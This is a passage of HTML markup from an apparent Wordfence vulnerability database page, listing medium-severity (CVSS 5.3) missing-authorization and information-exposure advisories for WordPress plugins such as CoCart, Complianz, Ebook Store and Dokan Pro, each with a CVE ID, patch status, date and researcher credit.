				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/civi-framework" target="_blank" rel="noopener">Civi Framework</a> <span class="wfvr-software-slug">[civi-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7364f803-9808-4337-8922-2d7c88849361" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22a73d1a-02ba-4453-a2c8-0b79a75313f6" target="_blank" rel="noopener">CoCart – Headless REST API for WooCommerce &lt;= 4.8.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59536" target="_blank" rel="noopener noreferrer">							CVE-2026-59536						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cart-rest-api-for-woocommerce" target="_blank" rel="noopener">CoCart – Headless REST API for WooCommerce</a> <span class="wfvr-software-slug">[cart-rest-api-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22a73d1a-02ba-4453-a2c8-0b79a75313f6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b192dd62-477d-463d-a284-9f3232db27ca" target="_blank" rel="noopener">Complianz – GDPR/CCPA Cookie Consent &lt;= 7.5.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65498" target="_blank" rel="noopener noreferrer">							CVE-2026-65498						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/complianz-gdpr" target="_blank" rel="noopener">Complianz – GDPR/CCPA Cookie Consent</a> <span class="wfvr-software-slug">[complianz-gdpr]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b192dd62-477d-463d-a284-9f3232db27ca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb697a3f-2ce5-4897-bee4-3e81fd97fa5e" target="_blank" rel="noopener">Content Control – The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks &amp; More &lt;= 2.6.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65485" target="_blank" rel="noopener noreferrer">							CVE-2026-65485						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-control" target="_blank" rel="noopener">Content Control – The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks &amp; More</a> <span class="wfvr-software-slug">[content-control]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e80ce9dc8cd55ea122ada90f882b7d82.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e80ce9dc8cd55ea122ada90f882b7d82"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener">Que Thanh Tuan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb697a3f-2ce5-4897-bee4-3e81fd97fa5e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/830a7ca0-a83b-49e9-bbfb-43b509ec4aff" target="_blank" rel="noopener">Create &lt;= 2.5.3 &#8211; Unauthenticated Sensitive Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65490" target="_blank" rel="noopener noreferrer">							CVE-2026-65490						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-create" target="_blank" rel="noopener">Create</a> <span class="wfvr-software-slug">[mediavine-create]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e80ce9dc8cd55ea122ada90f882b7d82.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e80ce9dc8cd55ea122ada90f882b7d82"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener">Que Thanh Tuan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/830a7ca0-a83b-49e9-bbfb-43b509ec4aff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c94c2b2a-03c8-4ffe-83f9-2142385a0363" target="_blank" rel="noopener">Ditty – Responsive News Tickers, Sliders, and Lists &lt;= 3.1.66 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27355" target="_blank" rel="noopener noreferrer">							CVE-2026-27355						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ditty-news-ticker" target="_blank" rel="noopener">Ditty – Responsive News Tickers, Sliders, and Lists</a> <span class="wfvr-software-slug">[ditty-news-ticker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c94c2b2a-03c8-4ffe-83f9-2142385a0363" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67e7f95f-3c48-4a20-ba7f-e88fa565b451" target="_blank" rel="noopener">Dokan Pro &lt;= 5.0.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65495" target="_blank" rel="noopener noreferrer">							CVE-2026-65495						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-pro" target="_blank" rel="noopener">Dokan Pro</a> <span class="wfvr-software-slug">[dokan-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67e7f95f-3c48-4a20-ba7f-e88fa565b451" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c0d1145d-f888-4217-963c-c058a6a56f74" target="_blank" rel="noopener">Easy Digital Downloads – eCommerce Payments and Subscriptions made easy &lt;= 3.6.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59524" target="_blank" rel="noopener noreferrer">							CVE-2026-59524						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</a> <span class="wfvr-software-slug">[easy-digital-downloads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/james-paremain" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a25a9f7c7f7197d7cbb58738efd41ef.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a25a9f7c7f7197d7cbb58738efd41ef"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/james-paremain" target="_blank" rel="noopener">James Paremain</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c0d1145d-f888-4217-963c-c058a6a56f74" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90637d9c-88af-443e-aaa8-4ebcb65b3cef" target="_blank" rel="noopener">Ebook Store &lt;= 6.19 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65452" target="_blank" rel="noopener noreferrer">							CVE-2026-65452						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ebook-store" target="_blank" rel="noopener">Ebook Store</a> <span class="wfvr-software-slug">[ebook-store]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6dd380c38e13e8dc02631e8ea879a9e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6dd380c38e13e8dc02631e8ea879a9e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benzdeus" target="_blank" rel="noopener">benzdeus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/90637d9c-88af-443e-aaa8-4ebcb65b3cef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/24254691-f27c-4f6d-adb0-3b9e0b48b4ac" target="_blank" rel="noopener">Ebook Store &lt;= 6.19 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65453" target="_blank" rel="noopener noreferrer">							CVE-2026-65453						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ebook-store" target="_blank" rel="noopener">Ebook Store</a> <span class="wfvr-software-slug">[ebook-store]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/24254691-f27c-4f6d-adb0-3b9e0b48b4ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54bcd95e-52a8-49fb-9526-eb39549b5182" target="_blank" rel="noopener">Ebook Store &lt;= 6.19 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59529" target="_blank" rel="noopener noreferrer">							CVE-2026-59529						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ebook-store" target="_blank" rel="noopener">Ebook Store</a> <span class="wfvr-software-slug">[ebook-store]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ee838051f5b349d62b3dc49551eb17c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ee838051f5b349d62b3dc49551eb17c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener">hivesec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/54bcd95e-52a8-49fb-9526-eb39549b5182" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bb43aad-e3ac-4b32-a3c3-e3b6fce209fe" target="_blank" rel="noopener">Event Post &lt;= 6.1.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65486" target="_blank" rel="noopener noreferrer">							CVE-2026-65486						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-post" target="_blank" rel="noopener">Event Post</a> <span class="wfvr-software-slug">[event-post]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e80ce9dc8cd55ea122ada90f882b7d82.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e80ce9dc8cd55ea122ada90f882b7d82"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener">Que Thanh Tuan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4bb43aad-e3ac-4b32-a3c3-e3b6fce209fe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2bad2c75-c111-45e9-ad8c-c8f3af0e3154" target="_blank" rel="noopener">Event Tickets and Registration &lt;= 5.29.0.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65567" target="_blank" rel="noopener noreferrer">							CVE-2026-65567						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-tickets" target="_blank" rel="noopener">Event Tickets and Registration</a> <span class="wfvr-software-slug">[event-tickets]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2bad2c75-c111-45e9-ad8c-c8f3af0e3154" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/11a61bef-da3b-46d6-8f78-0d4f9922f671" target="_blank" rel="noopener">Events Made Easy &lt;= 3.1.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59557" target="_blank" rel="noopener noreferrer">							CVE-2026-59557						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-made-easy" target="_blank" rel="noopener">Events Made Easy</a> <span class="wfvr-software-slug">[events-made-easy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1ff6f83f830b125bfe22fa490eb2bfe7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ff6f83f830b125bfe22fa490eb2bfe7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hieupenguinnn" target="_blank" rel="noopener">HieuPenguinnn</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/11a61bef-da3b-46d6-8f78-0d4f9922f671" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff7d09d1-bbc7-417c-bb3c-30f9ffe49522" target="_blank" rel="noopener">Falcon – WordPress Optimizations &amp; Tweaks &lt;= 2.10.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59531" target="_blank" rel="noopener noreferrer">							CVE-2026-59531						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/falcon" target="_blank" rel="noopener">Falcon – WordPress Optimizations &amp; Tweaks</a> <span class="wfvr-software-slug">[falcon]</span></div>
</p></div>
